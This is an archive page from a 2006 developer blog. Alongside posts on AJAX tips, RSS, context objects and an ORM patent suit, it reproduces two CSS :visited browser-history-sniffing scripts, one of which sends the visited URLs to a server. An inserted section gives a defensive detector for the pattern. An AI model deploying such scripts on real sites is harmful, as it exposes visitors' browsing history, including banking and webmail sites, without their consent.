August 2006 - Posts

Stealing History (Part 2)

Cody Swann has a modified version of the exploit, built on Prototype, that works in IE and has support for AJAX requests:

<html>
<head>
<script type="text/javascript" src="http://script.aculo.us/prototype.js"></script>
</head>
<body>
Have you been to these sites?
<script type="text/javascript">

Snoop = Class.create();

Snoop.prototype = {
	initialize: function(options)
	{
		this.options = Object.extend({
			writeStyle: true,
			linkObjArray: null, //AN ARRAY OF JSON FORMATTED LINK OBJ IN THE FORM OF {link:'http://...',text:'nameOfSite'} THAT WILL BE CHECKED
			identifier: '', //IF SAVING THE DATA, THIS IS WHAT YOU WOULD LIKE TO USE TO IDENTIFY THE SESSION
			saveURL: null, //URL TO SEND THE DATA TO
			method: 'get', //METHOD USED IN AJAX SAVE
			transport: null, //TRANSPORT USED TO SEND SAVED DATA (XMLHTTPRequest by default)
			onComplete: function(visitedLinks)///FUNCTION CALLED AFTER PARSING LINKS
			{
				var dummy = document.createElement('ul');
				visitedLinks.each(
					function(linkObj)
					{
						var text = document.createTextNode(linkObj.text);
						var node = document.createElement('a');
						var li = document.createElement('li');
						node.appendChild(text);
						node.setAttribute('href',linkObj.link);
						li.appendChild(node);
						dummy.appendChild(li);
					}
				);
				document.body.appendChild(dummy);
			},
			onSaveComplete: function(){},///CALLBACK FOR AJAX FUNCTION ON SUCCESS
			onSaveError: function(){}///CALLBACK FOR AJAX FUNCTION ON FAILURE
		}, options || {});
		this._visitedLinks = [];
		if(this.options.writeStyle)
		{
			document.write('<style type="text/css">a.testerLink:visited{display:block;height:1px;}</style>');
		}
		this.collectVisitedLinks();
		this.finish();
	},
	collectVisitedLinks: function()
	{
		var dummy = document.createElement('div');
		dummy.id = 'visitTestDiv';
		Element.setStyle(dummy,{visibility:'hidden',height:'1px',lineHeight:'1px'});
		document.body.appendChild(dummy);
		var linkObjs = this.options.linkObjArray || [{link:'http://new.com/',text:'new'},{link:'http://new.2com/',text:'new2'},{link:'http://google.com/',text:'Google.com'},{link:'http://espn.go.com/',text:'ESPN.com'},{link:'http://script.aculo.us/',text:'Scriptaculous'},{link:'http://digg.com/',text:'Digg'},{link:'http://blog.slimc.com/',text:'Slimc.com'},{link:'http://www.cnn.com/',text:'CNN.com'},{link:'http://www.yahoo.com/',text:'Yahoo!'},{link:'http://myspace.com',text:'MySpace'},{link:'http://www.ebay.com/',text:'ebay'},{link:'http://wikipedia.org/',text:'Wikipedia'},{link:'http://amazon.com/',text:'Amazon.com'},{link:'http://sfbay.craigslist.org/',text:"Craig's List"}];
		linkObjs.each(
			function(linkObj,count)
			{
				var text = document.createTextNode(linkObj.text);
				var node = document.createElement('a');

				node.setAttribute('href',linkObj.link);
				Element.addClassName(node,'testerLink');
				dummy.appendChild(node);
				if(parseInt(Element.getHeight(node)) != 0)
				{
					this._visitedLinks.push(linkObj);
				}
				Element.remove(node);
			}.bind(this)
		);
		Element.remove(dummy);
	},
	finish: function()
	{
		if(this.options.saveURL)
		{
			var urls = this._visitedLinks.collect(function(link){ return link.link; });
			urls = urls.join(',');
			urls = escape(urls.replace(/,$/,''));
			urls = urls.replace(/%2C/g,','); // restore every escaped comma separator, not only the first
			new Ajax.Request(this.options.saveURL,{
				transport: this.options.transport,
				method: this.options.method,
				parameters: 'id=' + this.options.identifier + '&urls=' + urls,
				onSuccess: this.options.onSaveComplete,
				onFailure: this.options.onSaveError
			});
		}
		this.options.onComplete(this._visitedLinks);
	}
};
new Snoop({saveURL:'/right/here'});
</script>
</body>
</html>

[1] http://blog.slimc.com/prototype-javascript-ending-privacy-one-visit-at-a-time/

Replacing the CPU with the GPU

I've been keeping an eye on this type of thing ever since I read a paper about using the GPU for generic tasks. We are beginning to see GPUs enter a new area, where they function like math coprocessors of the old days. This is going to be great for the bioinformatics industry.

[1] http://channel9.msdn.com/showpost.aspx?postid=229585

Stealing History

Update: Cody Swann has a version that works in IE and supports AJAX to log the URLs somewhere. Info here.

Jeremiah Grossman has demonstrated an interesting way to sniff out browser history via CSS hacks. IE7 RC1 is smart enough to block the site, but Firefox lists my history without any complaints. Spooky. The script is embedded on the page, and it appears that the basic technique involves setting the visited link color via CSS on a group of links to common sites, and then getting the computed values of the links and seeing which ones have the visited color. Very clever way to hijack someone's history:

<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
"http://login.yahoo.com/",
"http://www.jailbabes.com",
"http://ha.ckers.org",
"http://seoblackhat.com",
"http://www.cgisecurity.com",
"http://www.spidynamics.com",
"http://www.cenzic.com",
"http://www.watchfire.com",
"http://www.ntobjectives.com",
"http://www.webappsec.org",
"http://www.whitehatsec.com",
"http://english.aljazeera.net/HomePage",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://my.yahoo.com/",
"http://slashdot.org/",
"http://www.myspace.com/",
"http://www.amazon.com/",
"http://www.aol.com/",
"http://www.bankofamerica.com/",
"http://www.bankone.com/",
"http://www.blackhat.com/",
"http://www.blogger.com/",
"http://www.bofa.com/",
"http://www.capitalone.com/",
"http://www.chase.com/",
"http://www.citibank.com/",
"http://www.cnn.com/",
"http://www.comerica.com/",
"http://www.e-gold.com/",
"http://www.ebay.com/",
"http://www.etrade.com/",
"http://www.google.com/",
"http://www.hsbc.com/",
"http://www.icq.com/",
"http://www.microsoft.com/",
"http://www.msn.com/",
"http://www.myspace.com/",
"http://www.passport.net/",
"http://www.paypal.com/",
"http://www.sourceforge.net/",
"http://www.statefarm.com/",
"http://www.usbank.com/",
"http://www.wachovia.com/",
"http://www.wamu.com/",
"http://www.wellsfargo.com/",
"http://www.xanga.com/",
"http://www.yahoo.com/",
"https://commerce.blackhat.com/",
"https:/banking.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

var d = document.createElement('div');
d.id = 'xss_flag';
document.body.appendChild(d);

var d = document.createElement('table');
d.border = 0;
d.cellpadding = 5;
d.cellspacing = 10;
d.width = '90%';
d.align = 'center';
d.id = 'data';
document.body.appendChild(d);

document.write('<style>');
for (var i = 0; i < websites.length; i++) {
document.write('#id' + i + ":visited {color: #0000FF;}");
}
document.write('</style>');

/* launch steal history */

if (is_mozilla) {
stealHistory();
}

}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL. #
-----------------------------------------------------------------------*/
function stealHistory() {

// loop through websites and check which ones have been visited
for (var i = 0; i < websites.length; i++) {

var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];

document.body.appendChild(link);
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);

// check for visited
if (color == "rgb(0, 0, 255)") {
document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
} // end visited check

} // end visited website loop

} // end stealHistory method

</script>

[1] http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
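
An added example, not part of the original posts and not Grossman's or Swann's code: a heuristic static check a defender could run over page source to flag the pattern both scripts above share (a :visited rule, script-created anchors, and a read-back of computed style or element height). The function names, signal names and the three sample snippets are constructed for illustration.

```javascript
// Added example: heuristic static check for the :visited history-sniffing pattern.
// Signal names and the "all three signals" rule are assumptions of this sketch.
const SIGNALS = {
  // A CSS rule keyed on :visited, in markup or in a string written by script.
  visitedRule: /:visited\s*\{[^}]*\}/i,
  // Read-back of computed colour (Firefox script) or element height (Prototype script).
  readback: /getComputedStyle\s*\(|\.currentStyle\b|\.offsetHeight\b|Element\.getHeight\s*\(/,
  // Anchors created by script rather than authored in the page markup.
  scriptedAnchor: /createElement\s*\(\s*['"]a['"]\s*\)/i,
};

// Return the CSS property names set inside every :visited rule in the source.
function extractVisitedProperties(source) {
  const props = new Set();
  const ruleRe = /:visited\s*\{([^}]*)\}/gi;
  let m;
  while ((m = ruleRe.exec(source)) !== null) {
    for (const decl of m[1].split(';')) {
      const name = decl.split(':')[0].trim().toLowerCase();
      if (name) props.add(name);
    }
  }
  return [...props].sort();
}

function analyzeForHistorySniffing(source) {
  const hits = Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(source));
  const properties = extractVisitedProperties(source);
  // Anything other than a colour property changes layout, which the height probe needs.
  const layoutProps = properties.filter((p) => !/color$/.test(p));
  // Flag only when all three signals co-occur; a :visited rule alone is ordinary CSS.
  const suspicious = hits.length === 3;
  return { suspicious, hits, properties, layoutProps };
}

// Constructed samples, condensed from the two scripts on this page, plus a benign page.
const COLOR_PROBE = `document.write('#id0:visited {color: #0000FF;}');
var link = document.createElement("a");
var c = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");`;
const HEIGHT_PROBE = `document.write('<style>a.testerLink:visited{display:block;height:1px;}</style>');
var node = document.createElement('a');
if (parseInt(Element.getHeight(node)) != 0) {}`;
const BENIGN = `<style>a:visited { color: purple; }</style>
<script>var a = document.createElement('a'); a.href = '/help';</script>`;

for (const [name, src] of Object.entries({ COLOR_PROBE, HEIGHT_PROBE, BENIGN })) {
  const r = analyzeForHistorySniffing(src);
  console.log(name, r.suspicious, r.hits.join('+'), r.layoutProps.join(','));
}
```

The check is regex-based, so it is a triage signal for review rather than proof; obfuscated or dynamically assembled script will not match.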

Simple AJAX Steps for Success

We are doing a ton of AJAX work with Articulate Online. Here are 10 helpful hints if you are considering using AJAX in an upcoming project:

  1. You don't need an AJAX library 
  2. Download Aptana. Make it your default .js editor inside Visual Studio.
  3. Place all Javascript in external files (like codebehind)
  4. Instead of invoking requests directly from your pages, build a class library that does the dirty work.
    hint: once you have these base libraries, add the files to the code assist window to get auto-complete inside Aptana. Aptana lets you add documentation comments as well as parameter and return type information. Use it!
  5. You don't need an AJAX library.
  6. You can make classes in Javascript too.
  7. You don't have to define separate functions for async callbacks from webservices. Use anonymous methods to inline your code in the calling method.
  8. Consider providing ways to extend standard HTML elements rather than trying to make up all sorts of funky controls. Controls have a place, but consider the common example of a grid. A grid is really just a table. Don't create a grid class, provide a way to extend the table and add column sorts, row hover handling, row selection, etc. to it. Then, you can use standard HTML layouts and design and simply call a function or two to inject the features you want.
  9. Make sure to secure your AJAX server side.
  10. You don't need an AJAX library.

Why do I point out over and over that you don't need an AJAX library? Because all the AJAX hype out there makes the problems out to be a lot more difficult than they are. I would recommend one little script to abstract away SOAP or JSON requests, since you probably don't want to build that manually, but you don't really need much else to get started building AJAX into your applications. The most important thing to do is get a solid understanding of Javascript and CSS and make sure that you use standard DOM properties as much as possible. A great editor like Aptana can also be an extremely valuable tool. This isn't to say that using an AJAX library is a bad thing, just that you can get by fine without one if you would rather not add the extra dependencies and complexity to your app. The browser differences are not nearly as bad as the mobs might have you believe.

Also keep in mind that you don't have to make every element clickable and every node draggable. Web apps are not windows apps. You don't need one base page that everything is dynamically added to and removed from. On the contrary, it is nice to have back and forward buttons that actually do something. A lot of improvement can be made by simply adding a few AJAX callbacks to eliminate those annoying pages you used to have to make with 2 lines of text and a button.

Dare on AJAX / RSS

Great post by Dare 

...This reminds me of a conversation I was having with Eric Fleischman about blogging and RSS becoming mainstream yesterday. We agreed that blogging is already mainstream because everyone has a MySpace from politicians and school teachers to movie stars and DJs. On the other hand, I didn't think subscribing to feeds in a conventional aggregator would ever become used by a widespread percentage of the population. Subscribing to feeds seems cool to geeks because it solves a geek problem; having too many sources of information to keep track of and optimizing how this is done. The average person doesn't think it's cool to be able to keep track of 10 - 20 websites a day using some tool because they aren't interested in 10 - 20 websites on a daily basis in the first place. I'm sure a light sprinkling of AJAX can solve that problem as well.

*sprinkle* *sprinkle* *sprinkle*  [1]

[1] http://www.25hoursaday.com/weblog/PermaLink.aspx?guid=fe3c99ee-4430-4238-8975-93c38740d8b4

 

IContext = Good

Andrew Stopford asks: 

One of the comments in Phil's post on using the MVP pattern is mapping the Context object to a type that is based on a IContext pattern. For an example of what this does take a look at the interface here and its creation here (CreateContext method). It feels wrong to me though as you're adding the request and response data to a collection and getting at the data that way and it seems to go from one object layout to another. I guess that for unit test purposes (mocking the data that this contains for example) this would be useful, am I right in my thinking here. [1]

I can say confidently that context objects are definitely a good thing. Now, that isn't to say that every app needs them, but most complex apps can benefit from them. Testing your classes inside something like NUnit is only one part of the story. There are other instances where you might want to take part of the app outside of the web. For instance, while working on Articulate Online (very sweet LMSish product we are about to knock the socks off the entire e-Learning industry with), we decided we wanted to run reports in an external service rather than tying up the web processes. All of a sudden we were faced with having to be able to make calls into any of our classes (which make use of context to access things stored in places like session or query strings while on the web). Had we not made sure to create a context object to handle accessing this stuff (lessons learned from building a CMS product earlier), we would have been forced to go through our code and weed out all the Session["..."], Request["..."], and HttpContext references. Fortunately, planning ahead made running our code outside the web a seamless process.

[1] http://weblogs.asp.net/astopford/archive/2006/08/23/IContext_2C00_-good-or-bad.aspx

 

xFruits: Consume your RSS

xFruits is a slick service that lets you transform RSS/OPML/etc. in all sorts of neat ways (Mobile, Web, PDF). Here is a sample, my feed turned into a mobile site

  xFruits

Check it out. Very cool idea.

[1] http://www.xfruits.com

Posted by Jesse Ezell with no comments

ORM + You = Lawsuit

"FireStar recently filed a lawsuit (also in East Texas) against Red Hat for the use of the principle of Object Relational Mapping in Hibernate (developed by JBoss), a popular component of Java applications. Jim Farmer of immagic has confirmed that Sakai uses Hibernate and is, therefore, vulnerable to both direct and indirect infringement charges by FireStar. Farmer has also confirmed that while uPortal 2 does not use Hibernate, plans are underway to incorporate the component in uPortal 3. FireStar's patent claim goes beyond Hibernate, which is only one implementation among many of the Object Relational paradigm. Potentially any web framework that uses ORM, including those deployed in PHP, Ruby on Rails, or .NET, is vulnerable."

[1] http://tatler.typepad.com/nose/2006/08/the_patent_cris.html

C#->Javascript Compiler

You had to know it was only a matter of time. Google has their Java->Javascript compiler and the Xamlon guys have their C#->ActionScript compiler. Soon, we will have a C#->Javascript compiler thanks to Nikhil Kothari (Script#):

http://projects.nikhilk.net/Projects/ScriptSharp.aspx

 
